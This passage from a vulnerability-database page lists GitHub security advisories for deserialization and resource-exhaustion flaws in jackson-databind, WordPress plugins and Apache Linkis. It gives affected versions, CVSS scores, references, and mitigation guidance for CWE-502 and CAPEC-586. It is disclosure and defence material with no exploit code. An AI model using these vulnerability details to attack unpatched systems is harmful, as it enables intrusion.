  "id": "GHSA-jj9f-2mf3-f7x2",
  "modified": "2022-07-28T00:00:50Z",
  "published": "2022-07-20T00:00:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1984"
    },
    {
      "type": "WEB",
      "url": "https://www.hypr.com/security-advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JJJH-JJXP-WPFF

Vulnerability from github – Published: 2022-10-03 00:00 – Updated: 2024-09-13 18:29
VLAI
Summary
Uncontrolled Resource Consumption in Jackson-databind
Details

In FasterXML jackson-databind 2.4.0-rc1 until 2.12.7.1 and in 2.13.x before 2.13.4.2 resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. This was patched in 2.12.7.1, 2.13.4.2, and 2.14.0.

Commits that introduced vulnerable code are https://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45, https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1, and https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc.

Fix commits are https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea and https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33.

The 2.13.4.1 release does fix this issue, however it also references a non-existent jackson-bom which causes build failures for gradle users. See https://github.com/FasterXML/jackson-databind/issues/3627#issuecomment-1277957548 for details. This is fixed in 2.13.4.2 which is listed in the advisory metadata so that users are not subjected to unnecessary build failures

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0-rc1"
            },
            {
              "fixed": "2.12.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.13.0"
            },
            {
              "fixed": "2.13.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-42003"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-10-04T21:55:46Z",
    "nvd_published_at": "2022-10-02T05:15:00Z",
    "severity": "HIGH"
  },
  "details": "In FasterXML jackson-databind 2.4.0-rc1 until 2.12.7.1 and in 2.13.x before 2.13.4.2 resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. This was patched in 2.12.7.1, 2.13.4.2, and 2.14.0.\n\nCommits that introduced vulnerable code are \nhttps://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45, https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1, and https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc.\n\nFix commits are https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea and https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33.\n\nThe `2.13.4.1` release does fix this issue, however it also references a non-existent jackson-bom which causes build failures for gradle users. See https://github.com/FasterXML/jackson-databind/issues/3627#issuecomment-1277957548 for details. This is fixed in `2.13.4.2` which is listed in the advisory metadata so that users are not subjected to unnecessary build failures",
  "id": "GHSA-jjjh-jjxp-wpff",
  "modified": "2024-09-13T18:29:13Z",
  "published": "2022-10-03T00:00:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42003"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/issues/3590"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/issues/3627"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5283"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20221124-0004"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202210-21"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.13.4.1...jackson-databind-2.13.4.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commits/jackson-databind-2.4.0-rc1?after=75b97b8519f0d50c62523ad85170d80a197a2c86+174\u0026branch=jackson-databind-2.4.0-rc1\u0026qualified_name=refs%2Ftags%2Fjackson-databind-2.4.0-rc1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/blob/2.13/release-notes/VERSION-2.x"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FasterXML/jackson-databind"
    },
    {
      "type": "WEB",
      "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Uncontrolled Resource Consumption in Jackson-databind"
}

GHSA-JJPV-2MHH-MCMM

Vulnerability from github – Published: 2026-02-20 18:31 – Updated: 2026-02-24 21:31
VLAI
Details

Deserialization of Untrusted Data vulnerability in LoftOcean PatioTime patiotime allows Object Injection.This issue affects PatioTime: from n/a through < 2.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-67995"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-20T16:22:05Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data vulnerability in LoftOcean PatioTime patiotime allows Object Injection.This issue affects PatioTime: from n/a through \u003c 2.1.",
  "id": "GHSA-jjpv-2mhh-mcmm",
  "modified": "2026-02-24T21:31:34Z",
  "published": "2026-02-20T18:31:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67995"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Theme/patiotime/vulnerability/wordpress-patiotime-theme-2-1-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JJQR-925Q-XR8X

Vulnerability from github – Published: 2024-09-24 03:30 – Updated: 2025-02-07 18:31
VLAI
Details

The Easy Digital Downloads – Simple eCommerce for Selling Digital Files plugin for WordPress is vulnerable to deserialization of untrusted input via the 'upload[file]' parameter in versions up to, and including 3.3.3. This makes it possible for authenticated administrative users to call files using a PHAR wrapper, that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-2439"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-24T03:15:02Z",
    "severity": "HIGH"
  },
  "details": "The Easy Digital Downloads \u2013 Simple eCommerce for Selling Digital Files plugin for WordPress is vulnerable to deserialization of untrusted input via the \u0027upload[file]\u0027 parameter in versions up to, and including 3.3.3. This makes it possible for authenticated administrative users to call files using a PHAR wrapper, that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present.",
  "id": "GHSA-jjqr-925q-xr8x",
  "modified": "2025-02-07T18:31:16Z",
  "published": "2024-09-24T03:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2439"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3154854/easy-digital-downloads/tags/3.3.4/includes/admin/import/import-functions.php"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3154854/easy-digital-downloads/tags/3.3.4/src/Utils/FileSystem.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/644c8702-08ad-4048-ae91-041f1771f1dc?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JJQV-CCQ3-8RQV

Vulnerability from github – Published: 2025-10-22 15:31 – Updated: 2026-01-20 15:31
VLAI
Details

Deserialization of Untrusted Data vulnerability in quantumcloud KBx Pro Ultimate knowledgebase-helpdesk-pro allows Object Injection.This issue affects KBx Pro Ultimate: from n/a through <= 8.0.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-60232"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-22T15:16:00Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data vulnerability in quantumcloud KBx Pro Ultimate knowledgebase-helpdesk-pro allows Object Injection.This issue affects KBx Pro Ultimate: from n/a through \u003c= 8.0.5.",
  "id": "GHSA-jjqv-ccq3-8rqv",
  "modified": "2026-01-20T15:31:31Z",
  "published": "2025-10-22T15:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60232"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/knowledgebase-helpdesk-pro/vulnerability/wordpress-kbx-pro-ultimate-plugin-8-0-5-php-object-injection-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Plugin/knowledgebase-helpdesk-pro/vulnerability/wordpress-kbx-pro-ultimate-plugin-8-0-5-php-object-injection-vulnerability"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Plugin/knowledgebase-helpdesk-pro/vulnerability/wordpress-kbx-pro-ultimate-plugin-8-0-5-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JJQV-CPG4-VP45

Vulnerability from github – Published: 2024-04-11 03:34 – Updated: 2024-04-11 03:34
VLAI
Details

Deserialization of Untrusted Data vulnerability in PropertyHive.This issue affects PropertyHive: from n/a through 2.0.9.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-27985"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-11T01:25:07Z",
    "severity": "MODERATE"
  },
  "details": "Deserialization of Untrusted Data vulnerability in PropertyHive.This issue affects PropertyHive: from n/a through 2.0.9.\n\n",
  "id": "GHSA-jjqv-cpg4-vp45",
  "modified": "2024-04-11T03:34:59Z",
  "published": "2024-04-11T03:34:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27985"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-9-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JJVC-V8GW-5255

Vulnerability from github – Published: 2024-07-15 09:36 – Updated: 2024-07-15 17:36
VLAI
Summary
Apache Linkis DataSource remote code execution vulnerability
Details

In Apache Linkis <= 1.5.0, data source management module, when adding Mysql data source, exists remote code execution vulnerability for java version < 1.8.0_241. The deserialization vulnerability exploited through jrmp can inject malicious files into the server and execute them.

This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out.  We recommend that users upgrade the java version to >= 1.8.0_241. Or users upgrade Linkis to version 1.6.0.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.linkis:linkis-datasource"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.4.0"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-46801"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-15T17:36:37Z",
    "nvd_published_at": "2024-07-15T08:15:02Z",
    "severity": "HIGH"
  },
  "details": "In Apache Linkis \u003c= 1.5.0, data source management module, when adding Mysql data source, exists remote code execution vulnerability for java version \u003c 1.8.0_241. The deserialization vulnerability exploited through jrmp can inject malicious files into the server and execute them. \n\nThis attack requires the attacker to obtain an authorized account from Linkis before it can be carried out.\u00a0 We recommend that users upgrade the java version to \u003e= 1.8.0_241. Or users upgrade Linkis to version 1.6.0.\n\n",
  "id": "GHSA-jjvc-v8gw-5255",
  "modified": "2024-07-15T17:36:38Z",
  "published": "2024-07-15T09:36:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46801"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/linkis"
    },
    {
      "type": "WEB",
      "url": "https://linkis.apache.org/download/release-notes-1.6.0"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/0dnzh64xy1n7qo3rgo2loz9zn7m9xgdx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Apache Linkis DataSource remote code execution vulnerability"
}

Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Mitigation
Implementation

Explicitly define a final object() to prevent deserialization.

Mitigation
Architecture and Design Implementation
  • Make fields transient to protect them from deserialization.
  • An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Implementation

Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.

Mitigation
Architecture and Design Implementation

Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-586: Object Injection

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.